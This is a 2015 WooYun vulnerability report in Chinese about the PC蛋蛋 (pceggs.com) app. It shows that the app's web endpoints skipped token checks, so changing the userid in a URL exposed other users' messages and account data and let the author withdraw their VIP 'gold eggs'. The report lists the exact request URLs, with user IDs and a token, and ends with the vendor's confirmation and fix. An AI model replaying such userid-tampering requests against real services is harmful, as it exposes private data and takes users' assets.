漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-094253
漏洞标题:PC蛋蛋token审计不严导致可查阅任意账户信息并可提取任意账户VIP金蛋
相关厂商:pceggs.com
漏洞作者: 路人甲
提交时间:2015-01-27 22:22
修复时间:2015-03-13 22:24
公开时间:2015-03-13 22:24
漏洞类型:网络未授权访问
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-13: 细节向公众公开
简要描述:
由于PC蛋蛋的App审计不严格而引发的隐私信息泄露。
详细说明:
由于PC蛋蛋的App的Web端对token审计不严格而引发的隐私信息泄露。
0x01 准备工作
硬件:iPhone6、Broadcom 802.11n网卡的iMac
工具:sniffer tools
启用承载网络(虚拟AP):
下载APP:
注册登录:
0x02 证明漏洞
sniffer抓一下查看Message的包:
地址放到Chrome里访问下:
http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8&keycode=3B33F47EA87C9B19AE2A1E41E75BBF7
发现是可以访问的,那就是token和keycode起到了作用?OK,我们逐个参数去掉测试一下。
去掉keycode参数:
http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8
发现可以访问,那么难道只检查了token?我们把token去掉看看
去掉token参数:
http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867
见证奇迹的时刻,居然还可以访问!!难道就没有校验token??赶快换个userid试试!
1003的userid试试:
http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=1003
奇迹出现了,居然……
那其他页面存在这种问题吗?赶快看看……
个人中心:
http://app.pceggs.com/page/myeggs/app_myeggs.aspx?t=1&v=2.0.6&userid=17789037
无验证token查看VIP金蛋:
提取金蛋:
提取金蛋成功:
http://app.pceggs.com/page/myeggs/app_vip.aspx?type=1&t=1&v=2.0.6&userid=17789037
还有其他页面不罗列了,都是同样的问题。
漏洞证明:
修复方案:
校验一下token及keycode完整性
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:4
确认时间:2015-01-28 17:57
厂商回复:
感谢对PC蛋蛋安全的关注,已修复。
最新状态:
暂无